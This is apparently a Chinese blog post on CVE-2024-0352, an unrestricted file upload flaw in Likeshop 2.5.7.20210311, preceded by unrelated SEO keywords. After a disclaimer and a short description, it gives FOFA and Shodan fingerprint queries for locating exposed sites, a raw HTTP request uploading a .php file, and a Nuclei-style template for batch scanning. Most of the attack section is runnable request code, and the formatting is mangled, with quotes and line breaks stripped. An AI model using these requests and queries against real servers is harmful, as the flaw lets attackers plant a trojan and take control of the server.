无锡网站建设外包优势,简约装修,线上营销平台,抖音代运营合同模板免费完整版免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
Likeshop是一个100%开源免费的B2B2C多商户商城系统支持官方旗舰店商家入驻平台抽佣商家独立结算统一下单订单拆分等功能。该产品存在任意文件上传攻击者可通过此漏洞上传木马获取服务器权限。
二漏洞影响版本
version 2.5.7.20210311
三网络空间测绘查询
fofa icon_hash874152924
四漏洞复现 POC:
POST /api/file/formimage HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip, deflate------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; namefile;filenametest.php
Content-Type: application/x-phpThis page has a vulnerability!
------WebKitFormBoundarygcflwtei--批量检测
id: CVE-2024-0352info:name: Likeshop 2.5.7.20210311 - Arbitrary File Uploadauthor: CookieHanHoan,babybash,samuelsamuelsamuelseverity: highdescription: |A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434impact: |The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the products environment. As an impact it is known to affect confidentiality, integrity, and availability.remediation: Update to the latest versionreference:- https://nvd.nist.gov/vuln/detail/CVE-2024-0352- https://note.zhaoj.in/share/ciwYj7QXC4sZ- https://vuldb.com/?ctiid.250120- https://vuldb.com/?id.250120classification:cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:Lcvss-score: 7.3cve-id: CVE-2024-0352cwe-id: CWE-434metadata:verified: truemax-request: 1vendor: likeshopshodan-query: http.favicon.hash:874152924tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
variables:filename: {{rand_base(6)}}http:- raw:- |POST /api/file/formimage HTTP/1.1Host: {{Hostname}}Content-Type: multipart/form-data; boundary----WebKitFormBoundarygcflwteiUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36------WebKitFormBoundarygcflwteiContent-Disposition: form-data; namefile;filename{{filename}}.phpContent-Type: application/x-php{{randstr}}------WebKitFormBoundarygcflwtei--matchers:- type: dsldsl:- status_code 200- contains(body, \name\:\{{filename}}.php\)- contains_all(body, code\:1, base_url\:\uploads\\/user)condition: andextractors:- type: jsonpart: bodyjson:- .data.url
# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950
